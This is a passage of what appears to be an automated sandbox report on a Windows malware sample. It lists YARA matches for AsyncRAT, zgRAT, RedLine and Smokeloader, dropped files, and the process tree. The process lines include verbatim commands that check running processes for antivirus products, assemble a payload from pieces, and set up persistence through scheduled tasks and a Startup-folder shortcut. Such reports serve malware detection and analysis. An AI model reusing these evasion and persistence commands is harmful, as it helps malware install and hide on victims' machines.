Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D16B4	19_2_005D16B4
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005BF6A0	19_2_005BF6A0
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D78C3	19_2_005D78C3
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D1BA8	19_2_005D1BA8
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005DDBA5	19_2_005DDBA5
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005E9CE5	19_2_005E9CE5
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005CDD28	19_2_005CDD28
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005DBFD6	19_2_005DBFD6
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D1FC0	19_2_005D1FC0
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CA8C8F	24_2_00CA8C8F
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00C96620	24_2_00C96620
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00C998E0	24_2_00C998E0
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CAA88C	24_2_00CAA88C
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00C95880	24_2_00C95880
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CC6052	24_2_00CC6052
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CC81F1	24_2_00CC81F1
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CAB9AC	24_2_00CAB9AC
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00C9CAF0	24_2_00C9CAF0
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB0B00	24_2_00CB0B00
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB7CC0	24_2_00CB7CC0
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CA4C60	24_2_00CA4C60
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB641B	24_2_00CB641B
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CBF42E	24_2_00CBF42E
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CAC660	24_2_00CAC660
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CC1E79	24_2_00CC1E79
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CCA611	24_2_00CCA611
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00C94780	24_2_00C94780
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CCA731	24_2_00CCA731
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00748C8F	27_2_00748C8F
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00736620	27_2_00736620
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00766052	27_2_00766052
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_007398E0	27_2_007398E0
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00735880	27_2_00735880
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0074A88C	27_2_0074A88C
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_007681F1	27_2_007681F1
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0074B9AC	27_2_0074B9AC
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0073CAF0	27_2_0073CAF0
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00750B00	27_2_00750B00
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00744C60	27_2_00744C60
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0075F42E	27_2_0075F42E
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0075641B	27_2_0075641B
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00757CC0	27_2_00757CC0
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00761E79	27_2_00761E79
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0074C660	27_2_0074C660
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0074AE2C	27_2_0074AE2C
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0076A611	27_2_0076A611
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0076A731	27_2_0076A731
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00734780	27_2_00734780
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0040B219	31_2_0040B219
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00425054	31_2_00425054
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0044B17B	31_2_0044B17B
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0044C240	31_2_0044C240
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0044B29B	31_2_0044B29B
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_004466F0	31_2_004466F0
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00427843	31_2_00427843
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00424865	31_2_00424865
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0043B8A3	31_2_0043B8A3
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0044AA29	31_2_0044AA29
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00404AF0	31_2_00404AF0
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00429BE5	31_2_00429BE5
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00446B88	31_2_00446B88
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00404C70	31_2_00404C70
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00404E70	31_2_00404E70
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B152BB	31_2_02B152BB
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B3B3E2	31_2_02B3B3E2
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02AF50D7	31_2_02AF50D7
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B3C4A7	31_2_02B3C4A7
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B3B502	31_2_02B3B502
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B17AAA	31_2_02B17AAA
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B14ACC	31_2_02B14ACC
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B2BB0A	31_2_02B2BB0A
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B36957	31_2_02B36957
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02AF4ED7	31_2_02AF4ED7
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B19E4C	31_2_02B19E4C
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B3AC90	31_2_02B3AC90
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02AF4D57	31_2_02AF4D57

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe AB0CA1D93238D0EFC02A41A7B311EFE3FC07C042F22D0608D33EA5313A667E55
Source: Joe Sandbox View	Dropped File: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe 6B59309AB12F1859A94FB2CE1C98639B2A538E6E098FFAC127E45C29733BD993
Source: Joe Sandbox View	Dropped File: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe 3F074FB6A883663F2937FD9435FC90F8D31CEABE496627D40B3813DBCC472ED0

Enables security privileges

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process token adjusted: Security

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: String function: 005D8B30 appears 42 times
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: String function: 005D0D17 appears 70 times
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: String function: 005C1A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: String function: 007507C0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: String function: 00CB07C0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: String function: 02B0BCB7 appears 133 times
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: String function: 02B115F9 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: String function: 00421392 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: String function: 02B11C37 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: String function: 004219D0 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: String function: 0041BA50 appears 128 times

PE file contains more sections than normal

Source: channel2.exe.11.dr	Static PE information: Number of sections : 18 > 10
Source: Channel1[1].exe.11.dr	Static PE information: Number of sections : 18 > 10
Source: channel2[1].exe.11.dr	Static PE information: Number of sections : 18 > 10
Source: 3546345.exe.11.dr	Static PE information: Number of sections : 18 > 10

PE file contains strange resources

Source: meta[1].exe.11.dr	Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
Source: meta.exe.11.dr	Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"

Uses 32bit PE files

Source: wfJfUGeGT3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001F.00000002.4168709454.0000000002A0F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001F.00000002.4175235264.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\Windows.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: GOLD[1].exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: GOLD.exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: crypteda[1].exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: crypteda.exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: build2[1].exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: build2.exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: meta[1].exe.11.dr	Static PE information: Section: .rsrc ZLIB complexity 0.9984809027777778
Source: meta.exe.11.dr	Static PE information: Section: .rsrc ZLIB complexity 0.9984809027777778
Source: random[1].exe.11.dr	Static PE information: Section: ZLIB complexity 0.9974135728882834
Source: random[1].exe.11.dr	Static PE information: Section: prspuaeb ZLIB complexity 0.9943780728545888
Source: 36f677264b.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9974135728882834
Source: 36f677264b.exe.11.dr	Static PE information: Section: prspuaeb ZLIB complexity 0.9943780728545888

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@95/66@0/13

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_0061A6AD GetLastError,FormatMessageW,

19_2_0061A6AD

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00608DE9 AdjustTokenPrivileges,CloseHandle,		19_2_00608DE9
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00609399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		19_2_00609399

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_0061B976 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

19_2_0061B976

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00614148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

19_2_00614148

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_0061C9DA CoInitialize,CoCreateInstance,CoUninitialize,

19_2_0061C9DA

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_0061443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

19_2_0061443D

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif

File created: C:\Users\user\AppData\Local\TrackGuard Technologies

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\349587345342
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Mutant created: \Sessions\1\BaseNamedObjects\QGOn8xsapkNWVjl5
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Mutant created: \Sessions\1\BaseNamedObjects\1623b75a3df63053c0bc46185e9e5487
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4768:120:WilError_03

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

File created: C:\Users\user\AppData\Local\Temp\nsgC9EA.tmp

Jump to behavior

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit

Source: wfJfUGeGT3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: wfJfUGeGT3.exe	ReversingLabs: Detection: 13%
Source: wfJfUGeGT3.exe	Virustotal: Detection: 13%

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

File read: C:\Users\user\Desktop\wfJfUGeGT3.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\wfJfUGeGT3.exe "C:\Users\user\Desktop\wfJfUGeGT3.exe"
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 591950
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "BachelorRayPotentialBeats" Itsa
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif Shipment.pif E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe "C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe"
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe "C:\Users\user\AppData\Local\Temp\1000142101\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe "C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe"
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe "C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe"
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe "C:\Users\user\AppData\Local\Temp\1000194001\meta.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe "C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
